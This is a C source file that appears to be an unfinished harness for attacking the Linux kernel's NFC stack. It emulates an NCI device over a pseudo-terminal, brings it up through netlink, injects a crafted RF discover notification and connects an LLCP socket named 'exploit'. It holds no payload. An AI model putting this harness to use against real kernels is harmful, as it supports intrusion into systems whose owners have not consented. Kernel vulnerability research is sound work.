#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/genetlink.h>
#include <stdbool.h>

#include "ptty_device.h"
#include "nfc.h"
#include "netlink.h"

/* NFC socket protocols */
#define NFC_SOCKPROTO_RAW	0
#define NFC_SOCKPROTO_LLCP	1
#define NFC_SOCKPROTO_MAX	2

#define NFC_LLCP_MAX_SERVICE_NAME 63
struct sockaddr_nfc_llcp {
	sa_family_t sa_family;
	__u32 dev_idx;
	__u32 target_idx;
	__u32 nfc_protocol;
	uint8_t dsap; /* Destination SAP, if known */
	uint8_t ssap; /* Source SAP to be bound to */
	char service_name[NFC_LLCP_MAX_SERVICE_NAME]; /* Service name URI */;
	size_t service_name_len;
};

static struct nlmsg nlmsg;

int master, slave;

void* debug_thread(void* arg) {
    int fdmaster = *(int*)arg;
    while (1) {
        char buf[1024] = {0};
        ssize_t buf_size = read(fdmaster, buf, sizeof(buf));
        if (buf_size < 0)
            exit(1);
        printf("---------------- DEBUG DUMP ----------------\n");
        for(int i = 0; i < buf_size; i++)
            printf("%02x ", buf[i] & 0xff);
    }
    return NULL;
}

void prepare_target()
{
    /* prepare a packet */
    // [ 3-bits packet type | 1-bit pbf | 4-bits gid | 2-bits pad | 6-bits oid ]
    // [ 8-bits plen | ]
    uint8_t buf[1024] = {0};
    nci_mt_set(buf + 0, NCI_MT_NTF_PKT);
    buf[0] = buf[0] | NCI_GID_RF_MGMT;
    buf[1] = 0x03;
    buf[2] = sizeof(struct nci_rf_discover_ntf); // plen, not important...

    struct nci_rf_discover_ntf* discover = buf + 3;
    discover->rf_discovery_id = 0x1; // should be okay
    discover->rf_protocol = 0x1;
    discover->rf_tech_and_mode = NCI_NFC_B_PASSIVE_POLL_MODE; // try this one

    struct rf_tech_specific_params_nfcb_poll* bpoll = &(discover->rf_tech_specific_params);
    bpoll->sensb_res_len = 4;
    memcpy(bpoll->sensb_res, "AAAA", 4);

    discover->ntf_type = NCI_DISCOVER_NTF_TYPE_LAST;

    /* send the packet */
    // plen = 
    if (write(master, buf, NCI_CTRL_HDR_SIZE + sizeof(struct nci_rf_discover_ntf)) < 0) {
        perror("[!] NTF packet write\n");
        exit(1);
    }
}

int main(int argc, char* argv[])
{
    int err;
    master = getmaster();
    slave = getslave(master);
    if (nfc_register(slave) < 0) {
        printf("[!] failed to register NFC uart\n");
        exit(1);
    }

    pthread_t th;
    pthread_create(&th, NULL, debug_thread, &master);

    /* the device is still in down state, have to wake its up */
    // sad, have to use netlink, learn it in syzkaller initialize_wifi_devices()

    int nsock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
    if (nsock < 0) {
        perror("[!] netlink socket()");
        exit(1);
    }
    
    int nfc_family_id = netlink_query_family_id(&nlmsg, nsock, "nfc", true);
    // netlink commands: https://elixir.bootlin.com/linux/v5.13.2/source/include/uapi/linux/nfc.h#L94
    // during the setup, there are some nfc commands, see nci_open_device
    // there are nci_reset_req, nci_init_req, nci_init_complete_req, 
    // just like bluetooth, okay, I need some virtual device to replay the packets then

    struct genlmsghdr genlhdr = {0};
    genlhdr.cmd = NFC_CMD_DEV_UP;
    uint32_t idx = 0x2; // interesting 
    netlink_init(&nlmsg, nfc_family_id, 0, &genlhdr, sizeof(genlhdr));
    netlink_attr(&nlmsg, NFC_ATTR_DEVICE_INDEX, &idx, sizeof(uint32_t));
    err = netlink_send(&nlmsg, nsock);
    if (err < 0) {
        perror("[!] netlink device setup\n");
        exit(1);
    } 

    prepare_target();

    memset(&genlhdr, 0, sizeof(genlhdr));
    genlhdr.cmd = NFC_CMD_DEP_LINK_UP;
    uint8_t comm = NFC_COMM_ACTIVE;
    // uint32_t target_idx = -1; NFC_TARGET_IDX_ANY is okay
    netlink_init(&nlmsg, nfc_family_id, 0, &genlhdr, sizeof(genlhdr));
    netlink_attr(&nlmsg, NFC_ATTR_DEVICE_INDEX, &idx, sizeof(uint32_t));
    netlink_attr(&nlmsg, NFC_ATTR_COMM_MODE, &comm, sizeof(uint8_t));
    err = netlink_send(&nlmsg, nsock);
    if (err < 0) {
        perror("[!] netlink device dep link up\n");
        exit(1);
    } 

    // we should have nfc0 device now
    // let's create our socket
    int s = socket(AF_NFC, SOCK_STREAM, NFC_SOCKPROTO_LLCP);
    if (s < 0) {
        perror("[!] NFC socket()\n");
        exit(1);
    }

/*  We don't have to bind, just connect
    // try to bind it
    struct sockaddr_nfc_llcp addr;
    addr.sa_family = AF_NFC;
    addr.dev_idx = 0; // suppose so
    addr.target_idx = 1;    // no idea :(
    addr.nfc_protocol = 0;  // no idea :(
    // if (sock->ssap < LLCP_LOCAL_NUM_SAP && sock->ssap >= LLCP_WKS_NUM_SAP) { ...
    // #define LLCP_WKS_NUM_SAP   16
    // #define LLCP_LOCAL_NUM_SAP 32
    
    addr.ssap = 16;  // no idea
    strcpy(addr.service_name, "exploit");
    addr.service_name_len = strlen("exploit");

    if (bind(s, (struct sockaddr *)&addr, sizeof(struct sockaddr_nfc_llcp)) < 0) {
        perror("[!] NFC bind");
        exit(1);
    }
*/

    // can we fake connection here?
    // believe some data will be sent in connect
    struct sockaddr_nfc_llcp addr;
    addr.sa_family = AF_NFC;
    addr.dev_idx = 0x2; // suppose so
    addr.target_idx = NFC_TARGET_IDX_ANY;  

    // if (addr->service_name_len == 0 && addr->dsap == 0)
    //   return -EINVAL;
    
    strcpy(addr.service_name, "exploit");
    addr.service_name_len = strlen("exploit");

    addr.ssap = 16;
    addr.dsap = 16;

    if (connect(s, (struct sockaddr*)&addr, sizeof(struct sockaddr_nfc_llcp)) < 0) {
        perror("[!] nfc connect");
        exit(1);
    }

    while(1) {}

    return 0;
}
